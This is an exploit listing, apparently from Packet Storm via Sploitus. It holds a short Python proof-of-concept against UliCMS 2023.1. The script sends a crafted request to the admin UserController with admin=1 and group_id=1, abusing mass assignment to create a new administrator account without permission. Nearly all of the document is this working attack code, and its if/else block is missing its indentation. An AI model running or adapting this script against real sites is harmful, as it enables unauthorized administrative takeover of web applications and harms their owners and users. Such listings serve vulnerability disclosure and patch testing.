Share
## https://sploitus.com/exploit?id=PACKETSTORM:172586
#Exploit Title: Ulicms 2023.1 - create admin user via mass assignment  
#Application: Ulicms  
#Version: 2023.1-sniffing-vicuna  
#Bugs: create admin user via mass assignment  
#Technology: PHP  
#Vendor URL: https://en.ulicms.de/  
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip  
#Date of found: 04-05-2023  
#Author: Mirabbas Ağalarov  
#Tested on: Linux   
  
##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna  
  
import requests  
  
new_name=input("name: ")  
new_email=input("email: ")  
new_pass=input("password: ")  
  
url = "http://localhost/dist/admin/index.php"  
  
headers = {"Content-Type": "application/x-www-form-urlencoded"}  
  
data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language="  
  
response = requests.post(url, headers=headers, data=data)  
  
if response.status_code == 200:  
print("Request is success and created new admin account")  
  
else:  
print("Request is failure.!!")  
  
  
#POC video : https://youtu.be/SCkRJzJ0FVk